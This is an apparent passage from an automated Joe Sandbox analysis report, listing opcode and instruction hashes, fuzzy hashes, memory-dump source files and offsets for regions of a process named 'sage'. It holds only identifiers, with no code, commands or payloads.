                                                                                                                                                • Opcode Fuzzy Hash: ec1d4bf7bd0d4708dffddffeaa356bf7dffaad71eee3972c93746b024d7e0834
                                                                                                                                                • Instruction Fuzzy Hash: 9771F734700285CFCBA5DF28C894A6EBBF6AF89604B5500A6E912DB3B2DF70DC41CB51
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8b9c4f7f396bb1adc71d8f80e0f6dfd0b370581def6b44cf5d23ecbb3ff8c73a
                                                                                                                                                • Instruction ID: 8f3d634853ca7bb901b9a7fd8ec976f1e6b99c9f2fa5607199ec3f2337699f38
                                                                                                                                                • Opcode Fuzzy Hash: 8b9c4f7f396bb1adc71d8f80e0f6dfd0b370581def6b44cf5d23ecbb3ff8c73a
                                                                                                                                                • Instruction Fuzzy Hash: 7C51DEB1A14301CFC705FBF8D88562EBBF2AB89210F854AA9D444E3385DE3C9C45CBA5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8e98bc9d7b728c8e0bf928ca5cb67d2fec94d171cdcef06fa9edb188b96cb3d2
                                                                                                                                                • Instruction ID: 1aad96f5c4d2e4a60b629a67b66ffe4277812c11c396bcbd3b8c0c5fc215c24b
                                                                                                                                                • Opcode Fuzzy Hash: 8e98bc9d7b728c8e0bf928ca5cb67d2fec94d171cdcef06fa9edb188b96cb3d2
                                                                                                                                                • Instruction Fuzzy Hash: 1071E174E00218DFDB14DFA9D894AADBBB2FF89300F24816AE515AB364DB349942DF50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2e49d51f1f6a7f19c00e76a82c3e73dfc0883a4e2999906326e1146df0ee38bf
                                                                                                                                                • Instruction ID: 441c91620c99ae1fa9fdba72c6c181be3e421e200bff471271a1bf866f969ad0
                                                                                                                                                • Opcode Fuzzy Hash: 2e49d51f1f6a7f19c00e76a82c3e73dfc0883a4e2999906326e1146df0ee38bf
                                                                                                                                                • Instruction Fuzzy Hash: F3B09238024508CBE6183BB0FA8F0693F3CAE442273402820B22B805A08FB099908A61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7c3fa37d83e807513d53fda2bc6d7a1633743c3d7845e9b26fb83db85c2ea410
                                                                                                                                                • Instruction ID: 480482e6ec78fff1951fd10c87457d6ca013c91477d4d2640b5560a174a2cfd6
                                                                                                                                                • Opcode Fuzzy Hash: 7c3fa37d83e807513d53fda2bc6d7a1633743c3d7845e9b26fb83db85c2ea410
                                                                                                                                                • Instruction Fuzzy Hash: 9F51C43460434ADFCB11CF68C8849AFBBB5EF86310F5588A6D845C7215DB31E926CBA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7f1888ed8fdb1af46f1ccab578cbed9d16698fa19990e17d0e5eb56c6543da0d
                                                                                                                                                • Instruction ID: 5d4f9736cfe6b476b79b183f419c0fd6d1a3f327831c71c2a1b84c475ac1efbb
                                                                                                                                                • Opcode Fuzzy Hash: 7f1888ed8fdb1af46f1ccab578cbed9d16698fa19990e17d0e5eb56c6543da0d
                                                                                                                                                • Instruction Fuzzy Hash: F6419D357002048FDB189B69D854AAEBBB7EFCD710F148169E906D7390DE71DC02CBA2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9d8d27165d976f2144828d415b9c2e0168858e1fe355a72ff1a1e21f6b7b9700
                                                                                                                                                • Instruction ID: e89f0fbd40405de47dd0117e7bcdffd9a85c317ec31fb71161a9ef6cbe530a75
                                                                                                                                                • Opcode Fuzzy Hash: 9d8d27165d976f2144828d415b9c2e0168858e1fe355a72ff1a1e21f6b7b9700
                                                                                                                                                • Instruction Fuzzy Hash: 3441A431A0424ADFCF11CFA4C985ADFBFB1AF89314F048156E805AB265DB31E925CF91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 52484f42c996b9b2323832a6af22608a620cc0b7924104aea4bd35b865b44afe
                                                                                                                                                • Instruction ID: 9bc2b45acefe06400d69f0416eff64844181e60a84f5bf481012a0468b4e8b1c
                                                                                                                                                • Opcode Fuzzy Hash: 52484f42c996b9b2323832a6af22608a620cc0b7924104aea4bd35b865b44afe
                                                                                                                                                • Instruction Fuzzy Hash: 6D51B275E012189BDB08DFAAD940BEEBBB2BF89310F148029E515B7354DB349945CFA0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b441ad565db3e5f9b01a625953a4aa17c8499940a4f5c8612164905e6503267d
                                                                                                                                                • Instruction ID: 01f40add864c0f7cb8abb9cc31f1248af6ba073d62948fe23ddcc77d300c68c1
                                                                                                                                                • Opcode Fuzzy Hash: b441ad565db3e5f9b01a625953a4aa17c8499940a4f5c8612164905e6503267d
                                                                                                                                                • Instruction Fuzzy Hash: 58419F31704254CFCB099F69E858A6E7BA6EBC9359B0444A9E849CB3A1CF34DD41CB61
                                                                                                                                                Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7513dafb6e9e5d6801dcb4142642f4315f22937a1072f45bb92a5f604fc10f18
• Instruction ID: 342245fe7af12845b6f6ccbc0333b5e6e045272776298b4fd17cecc6b155cefa
• Opcode Fuzzy Hash: 7513dafb6e9e5d6801dcb4142642f4315f22937a1072f45bb92a5f604fc10f18
• Instruction Fuzzy Hash: A3411574E05209DFDB04CFAAD4806EEBBF6BF8A304F10906AD409B7251DB359A85CF54
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 669717141fa81dc45f5baa9411c1d9eb5036d7257ab65a2fd0ee3b817c2d1ede
• Instruction ID: e5856570995ff7bef1e8eed7233ee4cdcbd1029ad9d42b680b8762ece1672d0b
• Opcode Fuzzy Hash: 669717141fa81dc45f5baa9411c1d9eb5036d7257ab65a2fd0ee3b817c2d1ede
• Instruction Fuzzy Hash: BD41A274E012089FDB08DFAAD9847DEBBF2BF88310F548029E514A7354EB3899468B60
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73e94e1dd4b75d6ec8db71fc5450ef259b2a9477c1fcf898db147fbc9ababf2a
• Instruction ID: 664d37a73a62ffd5d2e4a3e74fe015da6a15f18d425a4d61c5a98d8fac957a55
• Opcode Fuzzy Hash: 73e94e1dd4b75d6ec8db71fc5450ef259b2a9477c1fcf898db147fbc9ababf2a
• Instruction Fuzzy Hash: 2D315A30A092909FC7119B348498399BF72EFC6225F0985EAED41CB262DF70D84AC760
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d7d6449e2273cf704d6feeb6c3ca5b5f9d1c17b66b6108eebfbe2d3f353c881
• Instruction ID: 19fb8330d48b9640d3a0a139d7fe26754b3e53dc525b4d8c86871209c8ef6310
• Opcode Fuzzy Hash: 5d7d6449e2273cf704d6feeb6c3ca5b5f9d1c17b66b6108eebfbe2d3f353c881
• Instruction Fuzzy Hash: EF31BE7190E285CFC302ABB4D8A96197FB2EF82210F4544EBD088E7182CF3C8855C796
Memory Dump Source
• Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a503ead392f5ce5ab9c280426d27282b1fbb1d581e043aad90ae481f0f123919
• Instruction ID: 5ad0b4813793a9f1577a13a596060a55fcfcd810f1a6c0dae5fed1be2299f7c0
• Opcode Fuzzy Hash: a503ead392f5ce5ab9c280426d27282b1fbb1d581e043aad90ae481f0f123919
• Instruction Fuzzy Hash: DF31E4726193808FC30677BCE89926DBFE1EF86211F460AAAD484E7291DE3C4C48C395
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 590158656315f10957af4c4f94b9d09e4bf12ceef52d2c239bb05605169701c8
• Instruction ID: 385bee633b456a376dc7e1022b2a15fd55ab96e94412febc0407d30bcd40c09b
• Opcode Fuzzy Hash: 590158656315f10957af4c4f94b9d09e4bf12ceef52d2c239bb05605169701c8
• Instruction Fuzzy Hash: D4410274E04219DFCB18CFA9D994ADDBBF2BF89300F10856AE905A7260DB309946DF50
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f6b05f43b5a280b676ce2eccfa87972f6d7db96f9df16c86f96d463e5e7f5e3
• Instruction ID: bce81065d3321c0f183f6b0275c2ca575a051254a9a53f4b45a5484df2345d30
• Opcode Fuzzy Hash: 1f6b05f43b5a280b676ce2eccfa87972f6d7db96f9df16c86f96d463e5e7f5e3
• Instruction Fuzzy Hash: E531E575E013089FDB09DFAAD954AEDFBB2BF89300F14806AE405B7351DB305946CBA0
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f38de44cce92775f6f1b889b2e9e92a312a2b2dd4cb3d53601fdc0536e4d31a8
• Instruction ID: 6f54b06764229a7bf54fb2ab420b7f505a18335d8514e7e2277a975d5ba935f8
• Opcode Fuzzy Hash: f38de44cce92775f6f1b889b2e9e92a312a2b2dd4cb3d53601fdc0536e4d31a8
• Instruction Fuzzy Hash: 7D2181367406118FC7249B2CC8A8A6AB7E6EFC972075A4169ED05CB376DF71DC06CB90
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb0efe816f6b06b1e4c2417abcdf1dfd7daac7b3cbdafe187bb8dff3764df06c
• Instruction ID: 144ec852ca9f17790274abd311b2e93ce7a66bcd6ed4d4ce4d675d9508670123
• Opcode Fuzzy Hash: bb0efe816f6b06b1e4c2417abcdf1dfd7daac7b3cbdafe187bb8dff3764df06c
• Instruction Fuzzy Hash: E821B170919695CFC306ABF8D4996197FF1EF42210F4548DBD088E7182CF38C894C7A6
Memory Dump Source
• Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9121b6a8feb0920d78386dbcf2e28a440715e17fec84f30e8e3d0270ba6f3214
• Instruction ID: e53b1ff35b3bf7ce94c4f08023bb94cda6f52ec4067d04427d0e343dfce8b7c9
• Opcode Fuzzy Hash: 9121b6a8feb0920d78386dbcf2e28a440715e17fec84f30e8e3d0270ba6f3214
• Instruction Fuzzy Hash: 3A21C275604240EFDB14EF28D8C4B66BB66EB88314F24C569E84B4B386D73AD847CA71
Memory Dump Source
• Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f72540a39b45aeaf349035e13a07e0a3b412a1b9a512c47722ba83f8bc7e7f9e
• Instruction ID: b43ef480c162bdaeca8b98a00d380885fdfa1c37e5023da6c11fc157aac87ada
• Opcode Fuzzy Hash: f72540a39b45aeaf349035e13a07e0a3b412a1b9a512c47722ba83f8bc7e7f9e
• Instruction Fuzzy Hash: 6E21F271504280EFDB05DF14D9C0B66BBA6FB88314F34C66DE84A4B242D33AD846CB71
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 750651f3eebde8ca9098b760058fc7163911280b35e76bb1ce4e365e97afdb27
• Instruction ID: 80720ade9bcef73d1aa7ff3ff66fa617d9aad5e2a7c62280d61c8e7f33a7010a
• Opcode Fuzzy Hash: 750651f3eebde8ca9098b760058fc7163911280b35e76bb1ce4e365e97afdb27
• Instruction Fuzzy Hash: 6311E6B1828201CBD301FBBCD8493197FE1EB81314F418DA9D4C9E7181DE39C869CB96
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a7cb30f8f04807b36b3e39c3341e1f2a99df9038400fd275ad51e12a31db486b
• Instruction ID: df7ecefc58e8911d80ef19caa1cef254c36e8d5a9af177598a98e440f765bdd8
• Opcode Fuzzy Hash: a7cb30f8f04807b36b3e39c3341e1f2a99df9038400fd275ad51e12a31db486b
• Instruction Fuzzy Hash: 7E114D36A00204DBCB148F64D894BEEBBB6FB8C310F148169E912A7790CA719C11CBA0
Memory Dump Source
• Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4c5c44a4bd02cb2e786cc6d08d763a7c6645270eedfd4ded61ff8f3cdc29e6f
• Instruction ID: c3aaa6e028091a0406078645b38052651a872913fb5b26c4bffa1b408a320d87
• Opcode Fuzzy Hash: a4c5c44a4bd02cb2e786cc6d08d763a7c6645270eedfd4ded61ff8f3cdc29e6f
• Instruction Fuzzy Hash: AF2180755093C0CFDB12DF24D990715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3e0a72dcdebc62c84164326f9818b4c08fab7195e870d6d4ec60b37d0e75329
• Instruction ID: da6460930c928519dd2e0c65f84964b0fa7c642e87c94835ebec949b2efaf4bb
• Opcode Fuzzy Hash: d3e0a72dcdebc62c84164326f9818b4c08fab7195e870d6d4ec60b37d0e75329
• Instruction Fuzzy Hash: FB118F74A15619DBC304BBF9E489A1E7FF6EB85310F4048A9E048F3244DF399C95C7A5
Memory Dump Source
• Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
Similarity
• API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8138d703fb6ab97616f0796cc328399ba68756b4fcf94ef185f689ac90939e7f
                                                                                                                                                • Instruction ID: 134398828485eb6ad89f990ba39e5580c14d9662fbc110a899ae0d7144b0d5a2
                                                                                                                                                • Opcode Fuzzy Hash: 8138d703fb6ab97616f0796cc328399ba68756b4fcf94ef185f689ac90939e7f
                                                                                                                                                • Instruction Fuzzy Hash: DA11CC35709390DFC715177958247ABFA9BAFCA310F14857AE546C3396CD288C0683B1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
                                                                                                                                                • Instruction ID: ddcb2821d02366701d4b5a7fcee22a965adde007f87896586ad1f362680625b9
                                                                                                                                                • Opcode Fuzzy Hash: 2d4981aff5dcf7b1fdaf38f60d6a83d7629a3a1e179a2025f34979c2780b8776
                                                                                                                                                • Instruction Fuzzy Hash: 75118B75904280DFDB12CF14D5C4B55BBA2FB88314F28C6AAD84A4B696D33AD84ACB61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bac417f5735d45f7de221766f03d099ffa71a44c4d9f59dde125af60f8acee01
                                                                                                                                                • Instruction ID: 9791cf8eefb43556153b4e7d578c474a8ca0233002adc69a1fb862ad6e39f5fe
                                                                                                                                                • Opcode Fuzzy Hash: bac417f5735d45f7de221766f03d099ffa71a44c4d9f59dde125af60f8acee01
                                                                                                                                                • Instruction Fuzzy Hash: 1701D670928601CBC300BBBDD44911E7BE5EF85320F408D69E4C9A3280EF39DC69CB9A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957446846.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dad000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 211a2b0db55351b34087ab26842c2d16a1771a0a8f3ffc635e1f401136170b5c
                                                                                                                                                • Instruction ID: 44d9bff4a708916e90f860a6c0b27dc5ca6da7ce93d2e41eb28f3005cee12634
                                                                                                                                                • Opcode Fuzzy Hash: 211a2b0db55351b34087ab26842c2d16a1771a0a8f3ffc635e1f401136170b5c
                                                                                                                                                • Instruction Fuzzy Hash: 8D01DB314043409AE7205A26DC84B67FF99DF46374F28C51AED4B5A786C37DD844CAB1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4d4fcb1119caeb3ed20ccb5ea7efbf86a6c1e551c3ae87c830419548e33ac851
                                                                                                                                                • Instruction ID: c7100910210a34e0c588f87d6e7041760fff16a794dfb8aeba146d0d04091c6d
                                                                                                                                                • Opcode Fuzzy Hash: 4d4fcb1119caeb3ed20ccb5ea7efbf86a6c1e551c3ae87c830419548e33ac851
                                                                                                                                                • Instruction Fuzzy Hash: 3B01FB74A045468FDB11CF59D5848AFFBF6EF88310B654165E809A7311DB30ED15CB61
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957446846.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dad000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c12bd1c11de57676f399fb21be13d75326174c5dce326b65486e78dd19c961cc
                                                                                                                                                • Instruction ID: 8d3afa891d0218c209a88b88c41cbb2970548aabfc53f5058c6152d4e7c5eb87
                                                                                                                                                • Opcode Fuzzy Hash: c12bd1c11de57676f399fb21be13d75326174c5dce326b65486e78dd19c961cc
                                                                                                                                                • Instruction Fuzzy Hash: FFF06D71404644AAE7208A1ADCC4B62FFA8EF96774F28C55AED095A782C37D9844CAB1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a70474095c1e6055be1e860115efc2c7f14471784d8491ef5dd78a4d2f5a7353
                                                                                                                                                • Instruction ID: 7fb06282fa92543549089e08041d468a504c6899a2fdb7f69f08f2348e15bfaa
                                                                                                                                                • Opcode Fuzzy Hash: a70474095c1e6055be1e860115efc2c7f14471784d8491ef5dd78a4d2f5a7353
                                                                                                                                                • Instruction Fuzzy Hash: 00E0D872D09244DFD7148BF4E8215BDBF30FED7211B1481D2D14AAB366DE28D516D760
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3e955c2183c5353bc98dc135cb0e0b79e4aea4b404f2c0b3ce1a830607613153
                                                                                                                                                • Instruction ID: 3893e386aa36636727244d71478fe53bd06b8f330981952047c98a18e2b4f666
                                                                                                                                                • Opcode Fuzzy Hash: 3e955c2183c5353bc98dc135cb0e0b79e4aea4b404f2c0b3ce1a830607613153
                                                                                                                                                • Instruction Fuzzy Hash: 4DF0A034C18248DFCB00DFB9A44969DBFF0AF89310F1045E9D849A3212D7315685CB40
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ce5efae0a1f82c2519b0c6e2f0b1a61e917407e7e022855ffa449af73c2a0ad3
                                                                                                                                                • Instruction ID: 5b0e5bc526c28e1f0f170dea7129c69201a56fd68f4381fab0248ccb14317229
                                                                                                                                                • Opcode Fuzzy Hash: ce5efae0a1f82c2519b0c6e2f0b1a61e917407e7e022855ffa449af73c2a0ad3
                                                                                                                                                • Instruction Fuzzy Hash: 11E04F34D04308DFCB40DFA9A54829CBBF8AB89301F1045A59808E3304EB319A80DB50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6f9b3d9eaaf64efe4da5af4f8f6143ca045ccf1851e4e6b2c2ba988bd1519db7
                                                                                                                                                • Instruction ID: 71c35e26721f57ee01ac0289538b43d67b6aed7602c4095b3c4860cd9f2a0ed7
                                                                                                                                                • Opcode Fuzzy Hash: 6f9b3d9eaaf64efe4da5af4f8f6143ca045ccf1851e4e6b2c2ba988bd1519db7
                                                                                                                                                • Instruction Fuzzy Hash: 95E0863440D3C45FC70B97759C70E597FB9DD42240F0581D5D082DA667D568584B8B71
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction ID: e97bdc12ba887b3174ce61926fbdbf3a2812d762d031508b7a6a9627fef76c59
                                                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction Fuzzy Hash: 57C0123360C2282EA224208E7C80EA3AA8CD2C22B4A210177F91CA32009C46AC8041A4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
